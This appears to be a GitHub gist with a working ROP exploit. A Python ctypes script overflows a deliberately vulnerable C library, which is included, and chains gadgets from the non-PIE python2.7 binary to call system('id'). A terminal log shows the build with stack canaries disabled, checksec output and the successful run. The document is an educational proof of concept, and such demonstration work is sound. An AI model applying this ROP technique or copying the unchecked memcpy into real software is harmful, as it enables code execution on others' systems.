Python ctypes exploitation example via python2.7 binary not being compiled with -fPIE

ex.py

from ctypes import *
libName = './libpwn.so'
libpwn = CDLL(libName)

payload = "A"*136 # buffer overflow
payload += "\xd4\x8a\x41\x00\x00\x00\x00\x00" # 0x0000000000418ad4 ; pop rdi; ret ;; from /usr/bin/python2.7 ; thanks https://github.com/JonathanSalwan/ROPgadget
payload += "\x19\xcb\x40\x00\x00\x00\x00\x00" # 40cb19 # "id\x00" from "setresgi\x00"
payload += '\x30\x68\x41\x00\x00\x00\x00\x00' # 0000000000416830 ; system@plt from /usr/bin/python2.7
print libpwn.pwnme(create_string_buffer(payload, len(payload)), len(payload))

gistfile1.txt

$ uname -a # Ubuntu 14.04 x86_64
Linux ubuntu 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ cat /proc/sys/kernel/randomize_va_space # yes, aslr is on
2
$ bash checksec.sh --file /usr/bin/python2.7 # from http://trapkit.de/tools/checksec.sh
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   /usr/bin/python2.7
$ gcc -std=c11 -Wall -fPIC -fPIE -Wl,-z,relro,-z,now -fno-stack-protector -shared -o libpwn.so pwn.c # ok, i cheated, stack cookies are disabled to make this easier
$ bash checksec.sh --file libpwn.so
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      No canary found   NX enabled    DSO             No RPATH   No RUNPATH   libpwn.so
$ python ex.py
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAԊA
uid=1000(jtd) gid=1000(jtd) groups=1000(jtd),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
[1]    68603 segmentation fault (core dumped)  python ex.py

pwn.c

#include <stdio.h>
#include <string.h>
#include <signal.h>

int pwnme(char* str, int len) {
  char buf[128] = {0};
  memcpy(buf, str, len);
  puts(buf);
  return 4;
}